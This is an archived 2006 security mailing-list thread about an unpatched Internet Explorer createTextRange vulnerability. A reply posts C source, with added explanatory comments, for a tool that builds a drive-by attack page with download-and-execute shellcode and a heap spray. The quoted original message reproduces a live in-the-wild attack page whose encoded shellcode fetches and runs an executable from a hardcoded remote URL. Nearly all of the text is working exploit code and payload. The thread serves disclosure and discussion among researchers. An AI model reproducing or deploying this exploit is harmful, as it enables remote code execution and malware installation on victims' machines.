 
RE: [Dailydave] IE attack...

From: Anthony Aykut (anthony.aykutframe4.com)
Date: Sat Mar 25 2006 - 10:50:18 CST


And here is the C code ;)

_Anthony

/*
*
* Internet Explorer "createTextRang" Download Shellcoded Exploit
* Bug discovered by Computer Terrorism (UK)
* http://www.computerterrorism.com/research/ct22-03-2006
* Reliable exploitation by Darkeagle of Unl0ck Research Team
* http://www.milw0rm.com/exploits/1606
*
* Affected Software: Microsoft Internet Explorer 6.x & 7 Beta 2
* Severity: Critical
* Impact: Remote System Access
* Solution Status: Unpatched (as of this posting, 25 March 2006)
*
* E-Mail: atmacaicqmail.com
* Web: http://www.spyinstructors.com,http://www.atmacasoft.com
* Credit to Kozan,Darkeagle,delikon,Stelian Ene
*
*/

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUF_LEN 0x1518
#define FILE_NAME "index.htm"

/*
 * First half of the generated page: the <input> element the exploit later
 * calls createTextRange() on, the opening <SCRIPT> tag, and the start of the
 * JavaScript string literal holding the shellcode as "%uXXXX" escapes (one
 * 16-bit code unit per token; unescape() turns it into two bytes, low byte
 * first).
 *
 * The literal is deliberately left open: the last line has no closing quote
 * and no ");".  main() appends the <WebUrl> argument as further "%uXXXX"
 * tokens and then "%u0000\");", so the URL ends up as a NUL-terminated
 * string embedded at the end of the shellcode.  The last tokens below
 * (%u686D%u2E68%u7865%u0065) appear to decode to a short NUL-terminated
 * ASCII name ending in ".exe" placed just before the URL -- inferred from
 * the byte values only, not verified by disassembly.
 */
char body1[] =
"<input type=\"checkbox\" id=\"blah\">\r\n"
"<SCRIPT language=\"javascript\">\r\n\r\n"
"shellcode = unescape(\r\n"
"\t\"%uCCE9%u0000%u5F00%u56E8%u0000%u8900%u50C3%u8E68%u0E4E%uE8EC\" +\r\n"
"\t\"%u0060%u0000%uC931%uB966%u6E6F%u6851%u7275%u6D6C%uFF54%u50D0\" +\r\n"
"\t\"%u3668%u2F1A%uE870%u0046%u0000%uC931%u5151%u378D%u8D56%u0877\" +\r\n"
"\t\"%u5156%uD0FF%u6853%uFE98%u0E8A%u2DE8%u0000%u5100%uFF57%u31D0\" +\r\n"
"\t\"%u49C9%u9090%u6853%uD87E%u73E2%u19E8%u0000%uFF00%u55D0%u6456\" +\r\n"
"\t\"%u30A1%u0000%u8B00%u0C40%u708B%uAD1C%u688B%u8908%u5EE8%uC35D\" +\r\n"
"\t\"%u5553%u5756%u6C8B%u1824%u458B%u8B3C%u0554%u0178%u8BEA%u184A\" +\r\n"
"\t\"%u5A8B%u0120%uE3EB%u4935%u348B%u018B%u31EE%uFCFF%uC031%u38AC\" +\r\n"
"\t\"%u74E0%uC107%u0DCF%uC701%uF2EB%u7C3B%u1424%uE175%u5A8B%u0124\" +\r\n"
"\t\"%u66EB%u0C8B%u8B4B%u1C5A%uEB01%u048B%u018B%uE9E8%u0002%u0000\" +\r\n"
"\t\"%uC031%uEA89%u5E5F%u5B5D%uE8C3%uFF2F%uFFFF%u686D%u2E68%u7865\" +\r\n"
"\t\"%u0065";   /* no closing quote: main() appends the URL tokens and "%u0000\");" */

/*
 * Second half of the generated page, emitted right after the "%u0000\");"
 * that main() uses to close the shellcode literal.  It is the heap-spray
 * script: a run of 0x9090 (x86 NOP) code units is doubled until it exceeds
 * slackspace, trimmed so that block.length + slackspace stays a power of two,
 * grown to 0x40000 code units, and 2020 copies of block + shellcode are kept
 * alive in an array before createTextRange() is invoked on the checkbox.
 * Every blank line of the script is written out as its own "\r\n" below so
 * the JavaScript reads line by line; the bytes are unchanged.
 */
char body2[] =
        "\r\n"
        "\r\n"
        "bigblock = unescape(\"%u9090%u9090\");\r\n"
        "slackspace = 20 + shellcode.length\r\n"
        "\r\n"
        "while (bigblock.length < slackspace)\r\n"
        "\tbigblock += bigblock;\r\n"
        "\r\n"
        "fillblock = bigblock.substring(0, slackspace);\r\n"
        "\r\n"
        "block = bigblock.substring(0, bigblock.length-slackspace);\r\n"
        "\r\n"
        "while(block.length + slackspace < 0x40000)\r\n"
        "\tblock = block + block + fillblock;\r\n"
        "\r\n"
        "memory = new Array();\r\n"
        "\r\n"
        "for ( i = 0; i < 2020; i++ )\r\n"
        "\tmemory[i] = block + shellcode;\r\n"
        "\r\n"
        "var r = document.getElementById('blah').createTextRange();\r\n"
        "\r\n"
        "</script>\r\n";

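/*
 * Re-encode s as JavaScript "%uXXXX" escapes, two input bytes per token with
 * the first byte in the low half, which is what the page's unescape() turns
 * back into the original byte sequence.  When strlen(s) is odd the final
 * token pairs the last byte with 0x00; the posted loop did the same thing
 * implicitly, because it read the terminating NUL as the high byte.
 *
 * Returns a malloc()ed, NUL-terminated string that the caller frees, or NULL
 * when allocation fails.  *out_len receives its length in characters.
 */
static char *escape_as_utf16(const char *s, size_t *out_len)
{
        size_t len = strlen(s);
        size_t pairs = (len + 1) / 2;        /* one token per (partial) byte pair */
        char *out = malloc(pairs * 6 + 1);   /* "%uXXXX" is six characters */

        if (out == NULL)
                return NULL;

        for (size_t i = 0; i < pairs; i++) {
                /* unsigned char: a byte >= 0x80 must print as two hex digits,
                 * not as a sign-extended eight-digit int. */
                unsigned char lo = (unsigned char)s[2 * i];
                unsigned char hi = (2 * i + 1 < len) ? (unsigned char)s[2 * i + 1] : 0;

                /* Seven bytes are available at this offset: the token plus a NUL
                 * that the next iteration (or the final write below) overwrites. */
                snprintf(out + 6 * i, 7, "%%u%02x%02x", hi, lo);
        }
        out[pairs * 6] = '\0';
        *out_len = pairs * 6;
        return out;
}

/*
 * Entry point.  Writes FILE_NAME to the current directory: body1, then
 * argv[1] as "%uXXXX" escapes, then "%u0000\");" (which NUL-terminates the
 * URL inside the shellcode and closes the JavaScript string and unescape()
 * call that body1 leaves open), then body2.
 *
 * Changes from the posted version, all memory-safety bugs in the generator
 * itself:
 *  - the per-token scratch buffer was char[5] for a six-character token, a
 *    stack overflow on every iteration, and a high-bit byte printed as eight
 *    hex digits via "%.2x" on a signed char;
 *  - the page buffer was a fixed BUF_LEN, filled by unchecked strcat() on top
 *    of a memcpy() that left it unterminated, so a long URL (or any URL,
 *    depending on heap contents) could overflow it; it is now sized exactly;
 *  - fwrite() wrote the whole BUF_LEN buffer, so the generated file carried
 *    uninitialized heap bytes after the page; only the page text is written;
 *  - malloc(), fwrite() and fclose() are checked and memory is freed.
 *
 * Returns 0 on success (and after printing usage), 1 on any failure; the
 * posted version returned 1 for success as well as for fopen() failure.
 */
int main(int argc, char *argv[])
{
        static const char tail[] = "%u0000\");";
        const size_t body1_len = sizeof body1 - 1;
        const size_t tail_len = sizeof tail - 1;
        const size_t body2_len = sizeof body2 - 1;
        size_t url_len = 0;
        size_t page_len = 0;
        char *url_escaped = NULL;
        char *page = NULL;
        char *p = NULL;
        FILE *out = NULL;
        int rc = 1;

        if (argc < 2) {
                printf("\nInternet Explorer \"createTextRang\" Download Shellcoded Exploit");
                printf("\nUsage:\n");
                printf(" ie_exp <WebUrl>\n");
                return 0;
        }

        url_escaped = escape_as_utf16(argv[1], &url_len);
        if (url_escaped == NULL) {
                printf("\n [Err:] malloc()");
                goto cleanup;
        }

        /* Exact size of the page, so no part of it can overrun the buffer. */
        page_len = body1_len + url_len + tail_len + body2_len;
        page = malloc(page_len + 1);
        if (page == NULL) {
                printf("\n [Err:] malloc()");
                goto cleanup;
        }

        p = page;
        memcpy(p, body1, body1_len);       p += body1_len;
        memcpy(p, url_escaped, url_len);   p += url_len;
        memcpy(p, tail, tail_len);         p += tail_len;
        memcpy(p, body2, body2_len);       p += body2_len;
        *p = '\0';

        out = fopen(FILE_NAME, "wb");
        if (out == NULL) {
                printf("\n [Err:] fopen()");
                goto cleanup;
        }
        if (fwrite(page, 1, page_len, out) != page_len) {
                printf("\n [Err:] fwrite()");
                goto cleanup;
        }
        /* fclose() flushes; a failure here means the file on disk is incomplete. */
        if (fclose(out) != 0) {
                out = NULL;
                printf("\n [Err:] fclose()");
                goto cleanup;
        }
        out = NULL;

        printf("\n\n" FILE_NAME " has been created in the current directory.\n");
        rc = 0;

cleanup:
        if (out != NULL)
                fclose(out);
        free(page);
        free(url_escaped);
        return rc;
}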

-----Original Message-----
From: Dave Aitel [mailto:daveimmunityinc.com]
Sent: 25 March 2006 17:41
To: dailydavelists.immunitysec.com
Subject: [Dailydave] IE attack...

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
 
So this is the IE attack various sites are owning people with...I stumbled
on it while browsing random things. It's been a pretty bad week for IE this
week. Of course, it's been a pretty bad year for IE.
Been a pretty bad time all around for IE. Motto: "Giving Host Intrusion
Prevention vendors case study after case study."

I don't know why the other lists aren't posting this. Maybe there was a memo
that went around where you try to keep people from knowing what they're
actually at risk from.

- -dave

<input type="checkbox" id="blah">
<SCRIPT language="java script">

shellcode = unescape(
 
"%u4343%u4343%u1fe8%u0005%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0
000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%
u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u000
0%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0
000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%
u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u000
0%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0
000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%
u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u000
0%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0
000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%
u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u000
0%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0
000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%
u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u000
0%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0
000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%
u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u000
0%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0
000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%
u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u000
0%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0
000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%
u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u000
0%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0
000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%
u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u000
0%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0
000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%
u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u000
0%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0
000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%
u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u000
0%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0
000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%
u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u000
0%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0
000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%
u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u000
0%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u6300%u6c61%u2
e63%u7865%u0065%u6f4d%u697a%u6c6c%u2f61%u2e34%u2030%u6328%u6d6f%u6170%u6974%
u6c62%u3b65%u4d20%u4953%u2045%u2e35%u3130%u203b%u6957%u646e%u776f%u2073%u544
e%u3520%u302e%u0029%u6977%u696e%u656e%u2e74%u6c64%u006c%u0000%u0000%u0000%u0
000%u0000%u0000%u03e8%u0000%u6e49%u6574%u6e72%u7465%u704f%u6e65%u0041%u6e49%
u6574%u6e72%u7465%u704f%u6e65%u7255%u416c%u4900%u746e%u7265%u656e%u5274%u616
5%u4664%u6c69%u0065%u6e49%u6574%u6e72%u7465%u6c43%u736f%u4865%u6e61%u6c64%u0
065%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%
u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u000
0%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0
000%u0000%u0000%u0000%u0000%u7468%u7074%u2f3a%u772f%u7777%u662e%u6c75%u666c%
u7461%u6b73%u6e69%u796e%u632e%u6d6f%u632f%u2e61%u7865%u0065%u0000%u0000%u000
0%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0
000%u0000%u6058%ud08b%u33fc%u64c0%u408b%u8b30%u0c40%u708b%uad1c%u688b%u5208%
u5252%u5252%u5252%u5252%u5252%u5252%u79bb%ue741%u5288%u0068%u0002%ue800%u019
1%u0000%u8b5f%u03f7%u81f8%ue8c6%u0003%ub900%u0009%u0000%ua4f2%ubb5a%u7959%u4
773%u006a%u8068%u0000%u6a00%u6a02%u6a00%u6800%u0000%u4000%ue852%u0161%u0000%
ue85a%u014b%u0000%u4289%u8304%u0cea%u71bb%ue8a7%u52fe%u4ae8%u0001%ubb00%uc21
b%u3b10%ue85a%u012f%u0000%u0289%uc283%u5210%ue850%u0133%u0000%u815a%ue8c2%u0
003%u8300%u09c2%u006a%u006a%u006a%u006a%uff52%u5ad0%u08e8%u0001%u8900%u0842%
u028b%u1bbb%u10c2%u833b%u1ec2%u5052%u04e8%u0001%u5a00%ueee8%u0000%u8b00%u8bd
8%u0842%uc281%u00a8%u0000%u006a%u0068%u0000%u6a80%u6a00%u5200%uff50%u5ad3%uc
ee8%u0000%u8900%u0842%u028b%u1bbb%u10c2%u833b%u2fc2%u5052%ucae8%u0000%u8b00%
u5af0%ub2e8%u0000%u8b00%u087a%uca8b%uc183%u5a0c%u5256%u5151%ue868%u0003%u520
0%uff57%u59d6%uc00b%u0774%u3983%u7500%ueb02%u5a2a%u5251%ue852%u0087%u0000%ud
a8b%uc383%u5e0c%u006a%u8b53%u0442%u4a8b%u510c%u5056%u4fbb%u6a47%ue807%u007b%
u0000%u595a%ueb5e%u5abd%ue85e%u005f%u0000%u428b%ubb04%uc776%ued00%ue850%u006
1%u0000%ubb5a%u4179%u88e7%u6852%u0200%u0000%u50e8%u0000%u5f00%uf78b%uf803%uc
681%u03e8%u0000%u09b9%u0000%uf200%u5aa4%uc033%uf28b%uc681%u0491%u0000%ufe8b%
uc783%uc710%u1047%u0044%u0000%u21bb%u05d0%u57d0%u5056%u6a50%u5020%u5050%u525
0%u12e8%u0000%u6100%u81c3%ue8c2%u0003%u8300%u09c2%uc283%u8334%u0cc2%u53c3%u5
756%u458b%u8b3c%u0554%u0378%u52d5%u528b%u0320%u33d5%u33c0%u41c9%u348b%u038a%
u33f5%uc1ff%u13cf%u03ac%u85f8%u75c0%u3bf6%u75fb%u5aea%u5a8b%u0324%u66dd%u0c8
b%u8b4b%u1c5a%udd03%u048b%u038b%u5fc5%u5b5e%ue0ff");

    bigblock = unescape("%u9090%u9090");
    slackspace = 20 + shellcode.length

    while (bigblock.length < slackspace)
        bigblock += bigblock;

    fillblock = bigblock.substring(0, slackspace);

    block = bigblock.substring(0, bigblock.length-slackspace);

    while(block.length + slackspace < 0x40000)
        block = block + block + fillblock;

    memory = new Array();

    for ( i = 0; i < 2020; i++ )
        memory[i] = block + shellcode;

    var r = document.getElementById('blah').createTextRange();

</script>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2.2 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
 
iD8DBQFEJXKktehAhL0gheoRApFMAJkBqhCnj2NTvVZ30sJUhhk/2gwkpgCcChNa
CNw1qWJPIKuPDBFaPZDW47U=
=+Vsq
-----END PGP SIGNATURE-----